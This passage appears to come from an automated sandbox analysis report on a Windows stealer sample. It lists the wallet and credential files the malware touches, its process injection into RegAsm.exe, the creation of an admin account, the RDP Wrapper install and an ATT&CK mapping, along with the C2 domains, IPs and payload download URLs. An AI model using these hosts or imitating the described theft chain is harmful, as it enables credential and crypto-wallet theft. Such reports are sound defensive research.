                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                                Source: Yara matchFile source: 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 396, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1144, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.file.exe.3d45570.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.file.exe.3d45570.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4108, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 396, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1144, type: MEMORYSTR
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessions
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnections
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2D0C40 sqlite3_bind_zeroblob,2_2_6C2D0C40
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2D0D60 sqlite3_bind_parameter_name,2_2_6C2D0D60
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1F8EA0 sqlite3_clear_bindings,2_2_6C1F8EA0
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                                Windows Management Instrumentation
                                1
                                LSASS Driver
                                1
                                LSASS Driver
                                21
                                Disable or Modify Tools
                                2
                                OS Credential Dumping
                                2
                                System Time Discovery
                                2
                                Remote Desktop Protocol
                                11
                                Archive Collected Data
                                12
                                Ingress Tool Transfer
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts11
                                Native API
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                111
                                Deobfuscate/Decode Files or Information
                                1
                                Credentials in Registry
                                1
                                Account Discovery
                                Remote Desktop Protocol4
                                Data from Local System
                                21
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                PowerShell
                                1
                                Create Account
                                2
                                Windows Service
                                41
                                Obfuscated Files or Information
                                Security Account Manager5
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Screen Capture
                                1
                                Non-Standard Port
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron2
                                Windows Service
                                511
                                Process Injection
                                12
                                Software Packing
                                NTDS56
                                System Information Discovery
                                Distributed Component Object Model2
                                Clipboard Data
                                3
                                Non-Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                Timestomp
                                LSA Secrets251
                                Security Software Discovery
                                SSHKeylogging124
                                Application Layer Protocol
                                Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                DLL Side-Loading
                                Cached Domain Credentials31
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items23
                                Masquerading
                                DCSync12
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                                Virtualization/Sandbox Evasion
                                Proc Filesystem1
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt511
                                Process Injection
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                                System Network Configuration Discovery
                                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519759 Sample: file.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 107 wallkedsleeoi.shop 2->107 109 vozmeatillu.shop 2->109 111 11 other IPs or domains 2->111 131 Suricata IDS alerts for network traffic 2->131 133 Found malware configuration 2->133 135 Antivirus detection for URL or domain 2->135 137 21 other signatures 2->137 11 file.exe 2 2->11         started        15 rdpvideominiport.sys 2->15         started        17 rdpdr.sys 2->17         started        19 tsusbhub.sys 2->19         started        signatures3 process4 file5 99 C:\Users\user\AppData\Local\...\file.exe.log, CSV 11->99 dropped 151 Contains functionality to inject code into remote processes 11->151 153 Writes to foreign memory regions 11->153 155 Allocates memory in foreign processes 11->155 157 Injects a PE file into a foreign processes 11->157 21 RegAsm.exe 1 163 11->21         started        26 conhost.exe 11->26         started        signatures6 process7 dnsIp8 119 cowod.hopto.org 45.132.206.251, 49778, 80 LIFELINK-ASRU Russian Federation 21->119 121 5.75.211.162, 443, 49740, 49741 HETZNER-ASDE Germany 21->121 123 2 other IPs or domains 21->123 91 C:\Users\...\66f5dbaca34ac_lfdnsafnds[1].exe, PE32 21->91 dropped 93 C:\Users\...\66f5db9e54794_vfkagks[1].exe, PE32 21->93 dropped 95 C:\Users\user\...\66f5d9ab0d4c7_rdp[1].exe, PE32 21->95 dropped 97 9 other files (7 malicious) 21->97 dropped 139 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->139 141 Found many strings related to Crypto-Wallets (likely being stolen) 21->141 143 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->143 145 5 other signatures 21->145 28 AFHDGDGIID.exe 21->28         started        33 GIIIIJDHJE.exe 2 21->33         started        35 IDBAFHDGDG.exe 2 21->35         started        37 cmd.exe 21->37         started        file9 signatures10 process11 dnsIp12 125 8.46.123.33, 3389, 49784 AS-PUBMATICUS United States 28->125 127 api.ipify.org 104.26.13.205, 49783, 80 CLOUDFLARENETUS United States 28->127 129 239.255.255.250 unknown Reserved 28->129 105 C:\Users\user\AppData\Local\...\RDPWInst.exe, PE32 28->105 dropped 167 Antivirus detection for dropped file 28->167 169 Machine Learning detection for dropped file 28->169 39 cmd.exe 28->39         started        41 cmd.exe 28->41         started        44 cmd.exe 28->44         started        55 4 other processes 28->55 171 Multi AV Scanner detection for dropped file 33->171 173 Writes to foreign memory regions 33->173 175 Allocates memory in foreign processes 33->175 46 RegAsm.exe 213 33->46         started        48 conhost.exe 33->48         started        177 Injects a PE file into a foreign processes 35->177 179 LummaC encrypted strings found 35->179 50 RegAsm.exe 35->50         started        53 conhost.exe 35->53         started        57 2 other processes 37->57 file13 signatures14 process15 dnsIp16 59 RDPWInst.exe 39->59         started        63 conhost.exe 39->63         started        147 Adds a new user with administrator rights 41->147 65 net.exe 41->65         started        67 conhost.exe 41->67         started        69 net.exe 44->69         started        71 conhost.exe 44->71         started        149 Tries to harvest and steal browser information (history, passwords, etc) 46->149 113 wallkedsleeoi.shop 104.21.36.139, 443, 49766 CLOUDFLARENETUS United States 50->113 115 gutterydhowi.shop 104.21.4.136, 443, 49767 CLOUDFLARENETUS United States 50->115 117 5 other IPs or domains 50->117 73 net.exe 55->73         started        75 net.exe 55->75         started        77 6 other processes 55->77 signatures17 process18 file19 101 C:\Program Files\RDP Wrapper\rdpwrap.dll, PE32+ 59->101 dropped 103 C:\Windows\System32\rfxvmt.dll, PE32+ 59->103 dropped 159 Multi AV Scanner detection for dropped file 59->159 161 Machine Learning detection for dropped file 59->161 163 Uses netsh to modify the Windows network and firewall settings 59->163 165 3 other signatures 59->165 79 netsh.exe 59->79         started        81 net1.exe 65->81         started        83 net1.exe 69->83         started        85 net1.exe 73->85         started        87 net1.exe 75->87         started        89 net1.exe 77->89         started        signatures20 process21

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                file.exe42%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                SourceDetectionScannerLabelLink
                                C:\ProgramData\AFHDGDGIID.exe100%AviraHEUR/AGEN.1311769
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe100%AviraHEUR/AGEN.1311769
                                C:\ProgramData\AFHDGDGIID.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\RDPWInst.exe100%Joe Sandbox ML
                                C:\Program Files\RDP Wrapper\rdpwrap.dll54%ReversingLabsWin64.PUA.RDPWrapper
                                C:\ProgramData\GIIIIJDHJE.exe42%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                C:\ProgramData\freebl3.dll0%ReversingLabs
                                C:\ProgramData\mozglue.dll0%ReversingLabs
                                C:\ProgramData\msvcp140.dll0%ReversingLabs
                                C:\ProgramData\nss3.dll0%ReversingLabs
                                C:\ProgramData\softokn3.dll0%ReversingLabs
                                C:\ProgramData\vcruntime140.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5db9e54794_vfkagks[1].exe42%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                C:\Users\user\AppData\Local\Temp\RDPWInst.exe47%ReversingLabsWin32.PUA.RDPWrap
                                C:\Windows\System32\rfxvmt.dll0%ReversingLabs
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                                https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                                http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                                http://www.entrust.net/rpa030%URL Reputationsafe
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                                https://www.ecosia.org/newtab/0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
                                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
                                https://help.steampowered.com/en/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/0%URL Reputationsafe
                                http://crl.entrust.net/ts1ca.crl00%URL Reputationsafe
                                https://login.steampowered.com/0%URL Reputationsafe
                                https://store.steampowered.com/legal/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
                                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
                                https://5.75.211.162/CGDHJEGHJ100%Avira URL Cloudmalware
                                http://aia.entrust.net/ts1-chain256.cer010%URL Reputationsafe
                                https://store.steampowered.com/0%URL Reputationsafe
                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199780418869G0%Avira URL Cloudsafe
                                http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220577http://147.45.44.104/prog/66f5db9e100%Avira URL Cloudmalware
                                https://5.75.211.162/V3100%Avira URL Cloudmalware
                                https://5.75.211.162/sqlp.dllI100%Avira URL Cloudmalware
                                stogeneratmns.shop100%Avira URL Cloudmalware
                                https://api.steampowered.com/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&amp;l=e0%Avira URL Cloudsafe
                                http://cowod.hopto.org_DEBUG.zip/c0%Avira URL Cloudsafe
                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe0%Avira URL Cloudsafe
                                https://reinforcenh.shop/api100%Avira URL Cloudmalware
                                https://store.steampowered.com/mobile0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
                                https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                                https://5.75.211.162/vcruntime140.dll100%Avira URL Cloudmalware
                                https://5.75.211.162/sqlp.dllB100%Avira URL Cloudmalware
                                wallkedsleeoi.shop100%Avira URL Cloudmalware
                                https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.00%Avira URL Cloudsafe
                                https://5.75.211.162/sqlp.dllV100%Avira URL Cloudmalware
                                https://steamcommunity.com/profiles/76561199780418869.100%Avira URL Cloudmalware
                                https://fragnantbui.shop/100%Avira URL Cloudmalware
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP0%Avira URL Cloudsafe
                                https://s.ytimg.com;0%Avira URL Cloudsafe
                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%Avira URL Cloudsafe
                                https://stogeneratmns.shop/100%Avira URL Cloudmalware
                                fragnantbui.shop100%Avira URL Cloudmalware
                                http://cowod.hoptoFIEHJDB0%Avira URL Cloudsafe
                                http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe100%Avira URL Cloudmalware
                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
                                offensivedzvju.shop100%Avira URL Cloudmalware
                                https://www.youtube.com/0%Avira URL Cloudsafe
                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%Avira URL Cloudsafe
                                https://www.google.com/recaptcha/0%Avira URL Cloudsafe
                                https://5.75.211.162AEBFC0%Avira URL Cloudsafe
                                https://stogeneratmns.shop/api1100%Avira URL Cloudmalware
                                https://5.75.211.162a0%Avira URL Cloudsafe
                                https://stogeneratmns.shop:443/api100%Avira URL Cloudmalware
                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a0%Avira URL Cloudsafe
                                https://5.75.211.162/mozglue.dllX100%Avira URL Cloudmalware
                                https://steamcommunity.com/profiles/76561199780418869/inventory/100%Avira URL Cloudmalware
                                https://5.75.211.162/g100%Avira URL Cloudmalware
                                https://steamcommunity.com/profiles/76561199780418869100%Avira URL Cloudmalware
                                https://steamcommunity.com/L0%Avira URL Cloudsafe
                                https://drawzhotdog.shop:443/api:100%Avira URL Cloudmalware
                                http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;100%Avira URL Cloudmalware
                                https://fragnantbui.shop:443/api100%Avira URL Cloudmalware
                                https://5.75.211.162/:3#100%Avira URL Cloudmalware
                                https://5.75.211.162/freebl3.dlll100%Avira URL Cloudmalware
                                https://reinforcenh.shop/apiO100%Avira URL Cloudmalware
                                https://steamcommunity.com/I0%Avira URL Cloudsafe
                                https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                                http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;100%Avira URL Cloudmalware
                                http://147.45.44.104100%Avira URL Cloudmalware
                                https://5.75.211.162/softokn3.dll100%Avira URL Cloudmalware
                                https://reinforcenh.shop/.itb100%Avira URL Cloudmalware
                                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                                https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU0%Avira URL Cloudsafe
                                https://stogeneratmns.shop/api100%Avira URL Cloudmalware
                                https://steamcommunity.com/login/home/?goto=profiles%2F765611997804188690%Avira URL Cloudsafe
                                https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%Avira URL Cloudsafe
                                http://hansgborn.eu0%Avira URL Cloudsafe
                                https://5.75.211.1620.5938.1320%Avira URL Cloudsafe
                                https://ghostreedmnu.shop/api100%Avira URL Cloudmalware
                                http://api.ipify.orgd0%Avira URL Cloudsafe
                                https://5.75.211.162/100%Avira URL Cloudmalware
                                http://cowod.hopto.org0%Avira URL Cloudsafe
                                http://hansgborn.eud0%Avira URL Cloudsafe
                                https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                fragnantbui.shop
                                188.114.96.3
                                truetrue
                                  unknown
                                  gutterydhowi.shop
                                  104.21.4.136
                                  truetrue
                                    unknown
                                    cowod.hopto.org
                                    45.132.206.251
                                    truetrue
                                      unknown
                                      offensivedzvju.shop
                                      188.114.96.3
                                      truetrue
                                        unknown
                                        drawzhotdog.shop
                                        172.67.162.108
                                        truetrue
                                          unknown
                                          ghostreedmnu.shop
                                          188.114.97.3
                                          truetrue
                                            unknown
                                            ballotnwu.site
                                            172.67.128.144
                                            truetrue
                                              unknown
                                              wallkedsleeoi.shop
                                              104.21.36.139
                                              truetrue
                                                unknown
                                                hansgborn.eu
                                                188.114.96.3
                                                truetrue
                                                  unknown
                                                  steamcommunity.com
                                                  104.102.49.254
                                                  truetrue
                                                    unknown
                                                    stogeneratmns.shop
                                                    188.114.97.3
                                                    truetrue
                                                      unknown
                                                      reinforcenh.shop
                                                      172.67.208.139
                                                      truetrue
                                                        unknown
                                                        api.ipify.org
                                                        104.26.13.205
                                                        truefalse
                                                          unknown
                                                          vozmeatillu.shop
                                                          188.114.97.3
                                                          truetrue
                                                            unknown
                                                            NameMaliciousAntivirus DetectionReputation
                                                            stogeneratmns.shoptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://reinforcenh.shop/apitrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://5.75.211.162/vcruntime140.dlltrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            wallkedsleeoi.shoptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://steamcommunity.com/profiles/76561199724331900true
                                                            • URL Reputation: malware
                                                            unknown
                                                            fragnantbui.shoptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exefalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            offensivedzvju.shoptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://steamcommunity.com/profiles/76561199780418869true
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://5.75.211.162/softokn3.dlltrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://stogeneratmns.shop/apitrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://ghostreedmnu.shop/apitrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://5.75.211.162/true
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabIDHIEB.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://duckduckgo.com/ac/?q=IDHIEB.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://steamcommunity.com/profiles/76561199780418869GRegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://5.75.211.162/CGDHJEGHJRegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://5.75.211.162/V3RegAsm.exe, 0000000B.00000002.2823050611.0000000000DEE000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&amp;l=eRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.gstatic.cn/recaptcha/RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220577http://147.45.44.104/prog/66f5db9eRegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://5.75.211.162/sqlp.dllIRegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://cowod.hopto.org_DEBUG.zip/cfile.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
